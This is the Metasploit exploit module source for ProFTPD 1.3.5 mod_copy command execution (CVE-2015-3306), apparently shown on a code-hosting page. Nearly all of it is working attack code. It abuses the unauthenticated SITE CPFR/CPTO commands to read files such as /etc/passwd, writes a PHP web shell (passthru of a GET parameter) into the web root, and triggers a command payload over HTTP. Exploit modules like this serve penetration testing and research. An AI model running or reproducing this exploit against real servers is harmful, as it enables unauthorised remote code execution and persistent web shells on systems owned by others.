Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::FileDropper1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution',17'Description' => %q{18This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.19Any unauthenticated client can leverage these commands to copy files from any20part of the filesystem to a chosen destination. The copy commands are executed with21the rights of the ProFTPD service, which by default runs under the privileges of the22'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website23directory, PHP remote code execution is made possible.24},25'Author' => [26'Vadim Melihow', # Original discovery, Proof of Concept27'xistence <xistence[at]0x90.nl>' # Metasploit module28],29'License' => MSF_LICENSE,30'References' => [31[ 'CVE', '2015-3306' ],32[ 'EDB', '36742' ],33[ 'URL', 'http://bugs.proftpd.org/show_bug.cgi?id=4169' ]34],35'Privileged' => false,36'Platform' => [ 'unix' ],37'Arch' => ARCH_CMD,38'Payload' => {39'BadChars' => '',40'Compat' => {41'PayloadType' => 'cmd',42'RequiredCmd' => 'generic gawk python perl netcat'43}44},45'Targets' => [46[ 'ProFTPD 1.3.5', {} ]47],48'DisclosureDate' => '2015-04-22',49'DefaultTarget' => 0,50'Notes' => {51'Stability' => [CRASH_SAFE],52'Reliability' => [REPEATABLE_SESSION],53'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]54}55)56)5758register_options([59OptPort.new('RPORT', [true, 'HTTP port', 80]),60OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),61OptString.new('TARGETURI', [true, 'Base path to the website', '/']),62OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),63OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])64])65end6667def ftp_port68datastore['RPORT_FTP']69end7071def check72sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)7374if sock.nil?75return CheckCode::Unknown("#{rhost}:#{ftp_port} - Failed to connect to FTP server")76end7778vprint_status("#{rhost}:#{ftp_port} - Connected to FTP server")7980# Set 30 second timeout to allow remote server time to perform reverse DNS lookup81res = sock.get_once(-1, 30)8283unless res && res.include?('220')84return CheckCode::Safe("#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")85end8687sock.puts("SITE CPFR /etc/passwd\r\n")88res = sock.get_once(-1, 10)8990if res.nil?91return CheckCode::Unknown("#{rhost}:#{ftp_port} - Failed to connect to FTP server")92end9394if res.include?("500 'SITE CPFR' not understood")95return CheckCode::Safe("#{rhost}:#{ftp_port} - SITE CPFR command not supported")96end9798if res.include?('530')99return CheckCode::Safe("#{rhost}:#{ftp_port} - SITE CPFR command requires authentication.")100end101102if res.include?('350')103return CheckCode::Appears("#{rhost}:#{ftp_port} - Unauthenticated SITE CPFR command was successful")104end105106CheckCode::Safe107ensure108sock.close unless sock.nil?109end110111def exploit112get_arg = rand_text_alphanumeric(5..7)113payload_name = rand_text_alphanumeric(5..7) + '.php'114115sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)116117if sock.nil?118fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")119end120121print_status("#{rhost}:#{ftp_port} - Connected to FTP server")122123# Set 30 second timeout to allow remote server time to perform reverse DNS lookup124res = sock.get_once(-1, 30)125unless res && res.include?('220')126fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")127end128129print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")130131sock.puts("SITE CPFR /proc/self/cmdline\r\n")132res = sock.get_once(-1, 10)133unless res && res.include?('350')134fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")135end136137sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")138res = sock.get_once(-1, 10)139unless res && res.include?('250')140fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")141end142143sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")144res = sock.get_once(-1, 10)145unless res && res.include?('350')146fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")147end148149sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")150res = sock.get_once(-1, 10)151unless res && res.include?('250')152fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")153end154155sock.close156157register_file_for_cleanup("#{datastore['SITEPATH']}/#{payload_name}")158159uri = normalize_uri(target_uri.path, payload_name)160print_status("Executing PHP payload #{uri}")161res = send_request_cgi!(162'uri' => uri,163'vars_get' => { get_arg => "nohup #{payload.encoded} &" }164)165166unless res && res.code == 200167fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")168end169end170end171172173